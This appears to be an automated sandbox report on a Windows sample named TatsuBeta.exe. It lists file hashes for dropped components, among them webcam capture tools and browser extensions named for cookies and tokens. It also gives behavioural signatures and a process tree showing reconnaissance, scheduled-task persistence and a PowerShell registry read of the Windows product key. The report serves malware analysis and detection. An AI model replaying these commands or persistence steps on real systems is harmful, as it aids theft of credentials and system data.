SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\resources\app.asar

MD5 df3c2f5a5d95f9861fde77bc9bd58509
SHA1 3ee9312dbb4c588612cd009696e13d103a31438d
SHA256 6c220279e304f2aa02936da0bf6b4ad00835c8433f16860d724297000c4e12e8
SHA512 ba1f5de34ac71f6573cf649d6bb0ebcb21d7a3f93d97d08460df839276aedd056cf752d12366a92d1b2a3edde8a915f37c303994f76d9b55e1cad423e4ba67b5

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 c0b36d56d83e601bf246f7709a8c5f9d
SHA1 b025a6070f7d61c7d1827856d2d4043834fd23f2
SHA256 45bb5e1f8dd87129ac0a75c78f8f29d06e3ac182a00fc5199b692068f1e05a53
SHA512 e429ae63bd8a7d5a936a638783511693e8fbbc91d97779b3d4dd3f0880f1c8a820106bfb57cf7ee6b3639f19165de87bbe127aadd81218689fc6c8fada2106d1

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\swiftshader\libEGL.dll

MD5 19dc9ee70e7765bb63a66b6826e8ecb7
SHA1 1a12f983f8b35cc2955d30657971f113c47dc164
SHA256 83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f
SHA512 1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 412dfe18c114548075ae3c48c1c1d902
SHA1 8b315b032af3893b7b668affc6032c508a9d1dbb
SHA256 7098fc1fdc6e2957fbc58f6a72d5b6769562b82415ac76e376c9c8f43bc57d68
SHA512 4095b80e225051f9b4154c63def185f50d5451633bcf6bbb52c86f3e54ffc357693ff04929bfcc8d550a92b8e5e4dcdc9e1e82e42ce1d9ffbe5c26d65a286187

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 51fa53323e3cc9899b48919bdee5fa50
SHA1 b69afd08fc5df4cc9fee90f1f8d32136f6466e65
SHA256 76194478cb2aeebd71a33653f24fbbd074f04f2f1af0c5786f17c821d96f9890
SHA512 234e9c4f92ca0311bd0aa645d46420b72aaa2452dbf0e973198199b2ffe04379052fd23b9232f9e1da8852f26c00129c6bd892a7033a510cb29508096f363008

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 bec12665d3c789b41cf5ef25fe533126
SHA1 8aa75174026aadae21305ba163d6974e306a7713
SHA256 6fe98326a560688a420e250e8d2c4f5431e497b50193d1a69ea5204c5a80efd1
SHA512 2ab4d9cd2a8ebdd41bd05ac09b2855a146c23a0681e8012d001eb95b29adf530a6eb138c8cb3032dd1e6387815a541e25f742ed00cff117a2ad722809609d3f9

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\icudtl.dat

MD5 5b12bbad1cd4a9a18db04bc10e8d1cb6
SHA1 50553deac39ca27a6d73d1e9538feefa2e9b5d36
SHA256 8946b6dbac3a18636a1e058dd76c2838adf4e054c0c48c5405a3161fb83ce463
SHA512 b1711bde245cbe4f0f75228f7c0c7521dff7f84accea1e7c6ada7024c25f04126dade1c92e9ad1bd489dd82bb0401ccb1bd043a5fbe1f80d590ff9b7a37b6e3c

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar

MD5 8f00cb693e1246dbef673b02694e7821
SHA1 95779ac88cf22e2a05818717b30050c47f492fad
SHA256 98cbf5c37e01a668459b337aa053ef6f10e3400267f52a63f956506e2d560fd8
SHA512 a56fa3b4a5150b94ecc14ee140f69f8ccc4a71cd6094d525f2245e4723d1cda49b9444014140359ba8413941833ae782a3de250c4cb457a5066bb7a9b5bb057b

C:\Users\Admin\AppData\Local\Temp\145f2760-9b81-4159-9ed6-1b62b35e2d92.tmp.node

MD5 92cbacb8a87125a3d8817759fdc2e326
SHA1 5bb4d8299fe7bddec780e24af2c4b00a8800378c
SHA256 f723e31ae33bd9e181a4e281fb41280718d57bc712c13c968a0ef8a3694155f6
SHA512 2ab375bc488f7f369052e8da3a68facda94da95d89560b30f9d836e4869702a40438c92b6b60f78fd2bf15d486661a58c07d232c5f4989a47de1f19e21e987c8

C:\Users\Admin\AppData\Local\Temp\1fbb7744-f65b-4444-989f-6566c550c9e0.tmp.node

MD5 5317f23583ba935be25a4c26b3f93828
SHA1 bdc288a0576a9ca04295c2df6f71e260ae5097bc
SHA256 41db88f72dbc4ace9b4e6522b19f60e012980345fcb737cab1839ab0bb2f2cb3
SHA512 e3975f92f6bbd814cec4b6762b7f7475168dd43a717031de0d8055b7f5e4ce01dd011557c1301f9f9084f8a39248630c12f265a195c54c81f1efad9dd5bd91d0

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources.pak

MD5 c0d714e8e717aaf611448d49e98a8ab4
SHA1 1d63f0faef0c2b8ef76653f5aab17916bc6e1cd9
SHA256 7f0aa4d14d9dc0c035a2112abe32c0fa743366de66ea002813d8d6ed884c7780
SHA512 95e892e0ab62880839db98efcb4dabd9509161515015e4bca8d8eafd9e4f6574c51b7414459bef8f51ec4e9749ae10a466c48779d34592a4b362120b98cf921b

memory/5032-578-0x00007FF994C20000-0x00007FF994C21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 ff759bc2ddf4606f475f6042db0ce54c
SHA1 4b864f2b6f3ff1ae2dd2d3fce4b51be216d895b5
SHA256 09f1491e72b38d60589616e2cd4a9ff736c30101d76cf64e247b0cf113357f66
SHA512 732792b0729ed1564f70c724fdd9d63c9cca14e4df23bf1a40c83f4f1a50ad289172443887974556e268bb5c01676bdbdd0907f3b02ecd5505f6518e647e7096

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 72dccee282275b1cadc6cdf14a15d766
SHA1 59ae2a24128371c0b9d7664724118961067bca94
SHA256 59458e2bb43a309c7bb6910c4990afc76a9ffcfeae0ff93ea2ba5d6f844fd412
SHA512 b7cd8f3aa64a93c2a314974d955019620b7b0e5b88cda9e5478a20248fa36557d81fceb89b82122633081c899b087e4ee2be7dfc8e85fe24c32f8234416f3d24

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libglesv2.dll

MD5 efb2d43d109b028ed69026e3898ab7dc
SHA1 511127d658beecde5be42d28bc9d1bb7bd9feb9e
SHA256 5743bfbc995adfee17cdf5455261c380cf240edb3b7ddc8ea4ae16301dc3d8fa
SHA512 39895b67ee081699f97e941a255f8f55f921c1d527d50454361f7dcdebec9f19d18bf0eec199358e6879a105330d614f6615d114deb3697deef24b8666604d21

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\d3dcompiler_47.dll

MD5 c1e9c5d58adb8f91dcd9793520676b14
SHA1 422e28f2ed9cdd55b21d52a9cf09084f1a987d34
SHA256 95b01b5c8cf10a4411f103babdbb19f20504b6b5198828a78337251ddaadf6ed
SHA512 63395fcb7fef1b4764359ed76b4982b4062b2fb0f2bbe7d104154d428237e0077248e9b172ce20a3b7a705439a11bf11d628105ee4c6ec1b020140368b353265

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 7f32af4fe4c5e8e1c3a12d81156e2a45
SHA1 924717c6c5b9c786b970a3f14d162c52c2374790
SHA256 754120d1e1cd4153dad81f89ecb1cda9b1501f9bf0632272c0af2acd32d46240
SHA512 4aa28b9bdef18f0e41b9feef7786964e74a552547de7050f8246f09f22fa5f7bc88137b00aaca4a2dc3bf69d7b1a192b144112f509489236371ea5570595dfa3

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 bffd88be230e662bf4d2e09e1d37d304
SHA1 52a1afb8298698a548001f6902e3705192db4876
SHA256 96fc1c4a83066f0d8c5039c721a6c85dd6e52709b027d36d984fdcb70356bd79
SHA512 137c71865632a6b4506b618c62ad838368aa228e1e559da17032196b71140525d61ad5bd26ab92992d42a0c9444287244a6945b5b7b11ea9ce7d5234f94d6fac

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libGLESv2.dll

MD5 8a009363a6560f059ee9174d52c74eff
SHA1 84d9e44d240c77259dd0af989ccfb074f50cde68
SHA256 620190d1cf65f4d74a0d7bf3f5ef0e422f0cf205f44edcfc2cafcc2fb236b340
SHA512 651085008718daea4d480dad71cda2467314e9318531cbd82fb3f93f7beee17f1d67ed2c6a1ea9567397b522a7707c502d61069996787888f5baa3d044d0699a

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\D3DCompiler_47.dll

MD5 cfc37540ff3ac356e0b0fbddbf1593f8
SHA1 fd8069d470aa7c9057f87ad11ec3f957bf4e4261
SHA256 f545c764dff40c730b946550a3bf2f9f9dd9a076853918c452a62445e1287853
SHA512 bfdac2bc267249a20b382e467fcb4ba913e70a938bdeaf0b0761eaa685e5f2cadabcb80bdfa4423d80d5e07f17ef80f23c4bf7e493f6330cee22b6209c7eff5c

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 4231004693f4daf0f58fd0d312673d47
SHA1 d6d7cc4f07d94cb0e3cf3888d3d1778879f4e5b8
SHA256 a025b93acadab070e395dd86a2fac817cb18c1f080d4bbef3acb2407e8c7e144
SHA512 38352f518615fe82d018542a0e7f139c8be5e6ba3bd19a5e6f748ab1d47a66302e4c8c3554c8e7d9cabca97c46bc946d501b864247e6d3f1f075107e1ccff00a

memory/5032-593-0x00000275B4E50000-0x00000275B4EEB000-memory.dmp

memory/1576-604-0x000001DBD89E0000-0x000001DBD8A02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_re3vudhj.m1h.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1576-614-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/1576-616-0x000001DBC0290000-0x000001DBC02A0000-memory.dmp

memory/1576-617-0x000001DBC0290000-0x000001DBC02A0000-memory.dmp

memory/1576-621-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/3296-631-0x0000028A6C3D0000-0x0000028A6C3E0000-memory.dmp

memory/3296-630-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/3296-633-0x0000028A6C3D0000-0x0000028A6C3E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6c9d692ed2826ecb12c09356e69cc09
SHA1 def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256 a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

memory/3296-638-0x0000028A6C3D0000-0x0000028A6C3E0000-memory.dmp

memory/3296-641-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/4416-647-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/4416-648-0x000002739FBD0000-0x000002739FBE0000-memory.dmp

memory/4416-649-0x000002739FBD0000-0x000002739FBE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

memory/4416-660-0x000002739FBD0000-0x000002739FBE0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

MD5 7af06309cd9378d4472dc4ceb5c72a1e
SHA1 78da756bb7e9cd754bed3d7e7ab01597718f27f4
SHA256 6a755c998bab381de85dfbedb4014dc630919e35a2eb4382c1e659136b6a7a0b
SHA512 7d289c7c3d526926dcb4a544c9650f3286d2759606fa879c047437de51fb3bc9552330d0d62a653effc749debda35cbbdd25d386b0b6b84739ec327a2a55620c

memory/4416-663-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/6400-666-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/6400-667-0x000002DA35E90000-0x000002DA35EA0000-memory.dmp

memory/6400-668-0x000002DA35E90000-0x000002DA35EA0000-memory.dmp

memory/6400-679-0x000002DA35E90000-0x000002DA35EA0000-memory.dmp

memory/6400-681-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/7908-683-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/7908-686-0x000001E9B7690000-0x000001E9B76A0000-memory.dmp

memory/7908-685-0x000001E9B7690000-0x000001E9B76A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5ea61f668ad9fe64ff27dec34fe6d2f
SHA1 5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b
SHA256 8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466
SHA512 cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

memory/7908-698-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\places.sqlite_tmp

MD5 f68d8310b1ef8a0991d7a1f85d37261b
SHA1 e70a54a60499893060cf7c00a222730e1dbe7a9b
SHA256 f1ace1d4cc8a8eb921913ae1ffcfbbaaca2a6010fc92874d820a758b2f0a15c5
SHA512 2fe9bf23922532072d83bce70e35eb2f1792f0ea3d4594ca115fc8b2a8f79cd60c3f39bbf2cb3be92916f5cb5f2801342281ad35a86551db99d4a2b4938a17dc

memory/3576-745-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/3576-746-0x00000238D3E00000-0x00000238D3E10000-memory.dmp

memory/3576-747-0x00000238D3E00000-0x00000238D3E10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9e4a16108b342d8f1cfb8c568d47da3b
SHA1 3aeeb65f8995f63853ca6167c122accd3bada9ab
SHA256 078ce4af1881e1e48657bd1e9b778bdd8e38ee16685f9029e2da68bd346d133b
SHA512 66b84f1d15751ad6ab01b3dbe41dbb1ef0fa1f199a91554e234573bf433856bb95677d930e1df63c2309ecaeabd38d96b79764120d607f8dc0265b3460b9c852

memory/3576-758-0x00000238D3E00000-0x00000238D3E10000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WJwS5S.vbs

MD5 e4e954c219eacb434bc9d9f52a39bf6d
SHA1 d7ad50c08d4180073695245dc72b3ffab05054e5
SHA256 787f0f87d8ec05c71591d5445763b0717a2c9ad89ec3e472602d1da88b9d4464
SHA512 cef89b68d78964284136179ca0aa3a685dd32313af5fc29befc46d92ea726c038936a15880d8b298c42284618db334b7f68884e1f6832592f9918faeba086c62

memory/3576-761-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/7256-795-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/7256-796-0x00000230EB070000-0x00000230EB080000-memory.dmp

memory/7256-797-0x00000230EB070000-0x00000230EB080000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 15d8e3386f7a8f0c4c3ee7a36b408d13
SHA1 fb67b9fe60f40448a6bce96f68ace1201f5a79de
SHA256 433074a36d596b6a958180680d0ddb88c26d5a3874e64a4a2a94de98b0ae1c6a
SHA512 fb5b4b3f4777f0dbcf954715a076c002bb1ba4b614e4527574eef9d094badedc377ecdb0a7b7cd488a0ea98feff225e5e0c1a96ab678042806a3536e14459e90

C:\Users\Admin\AppData\Roaming\salut4Qld0.ps1

MD5 28e4eda7451c625bbe806b745753f729
SHA1 d29e9b2c2ac5b10188cbae92cffba6827728543d
SHA256 da79e10cdff90aa7f5ab3d3f226570107ecd20d48eb14067c7900367111df5ba
SHA512 932f53b6cd2aa55ab1475d85528069357fa7d9eea26051d1a4edb11872ca30d02c31c44bed3a48f0ccdbebe556e9d8ec2f4a0815bf177d93ab4272b3fe2fb0b5

memory/7256-811-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo.png

MD5 2b67e47cb8da1058770fe41d8b947619
SHA1 9eb259b1d377a24a2b77a694cf31c23cef7b8eef
SHA256 46f616820751849512d2704ddb604666170d13315c4383b8c8611c3e1c2f594a
SHA512 27c0593d662df228e146c49af6da52e39523523af924cf95ba4890b1b42358b2b8df3cf2667d8f672eece4f7fe098574c4689677768dd54d3b872619c7b9ae55

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo16.png

MD5 f0f11cd478cc44d518c16820ede9d253
SHA1 cfaf8d2e071f2ade0894578e5b44e02032d27be4
SHA256 321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb
SHA512 ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

MD5 04c23766134b234e85cc537b2162efb1
SHA1 45c48d9ca30a4580a682f025cc66331e49f6f158
SHA256 f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900
SHA512 d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png

MD5 9f74f11972c3c0b161832ffab541bf31
SHA1 e5841ba20a229cdeab85d30690509e649e848271
SHA256 8b74a0abdd566ffdf15891d6abd3537bffb0abce7f362c737c3de6752e136032
SHA512 b90f13eb65a4dcfdd596a7d9eba7c1ba5eb1a598e51107ce3dca07c0a0025469ab18c9958eff2b36f7e05a23f0d16d7d9d7c2321b8e1f2a456aaa7bec3ced0e8

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

MD5 9ac39dc31635a363e377eda0f6fbe03f
SHA1 29fa5ad995e9ec866ece1d3d0b698fc556580eee
SHA256 9a2723c21fb1b7dff0e2aa5dc6be24a9670220a17ae21f70fdbc602d1f8acd38
SHA512 0799ae01799707b444fca518c3af9b91fda40d0a2c114e84bc52bd1f756b5e0d60f6fd239f04bd4d5bc37b6cdbf02d299185cd62410f2a514a7b3bd4d60b49fc

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

MD5 42ac88deb5c3cfc02fdc1c27319ee067
SHA1 97b1addf35159800b90743fcfbb5505e80f6eb82
SHA256 28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb
SHA512 77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5

Analysis: behavioral4

Detonation Overview

Submitted

2023-12-17 13:47

Reported

2023-12-17 13:51

Platform

win11-20231215-en

Max time kernel

5s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1448 --field-trial-handle=1684,16488817615885489717,17376577024114886649,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1916 --field-trial-handle=1684,16488817615885489717,17376577024114886649,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=4996 get ExecutablePath

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4996 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=4996 get ExecutablePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

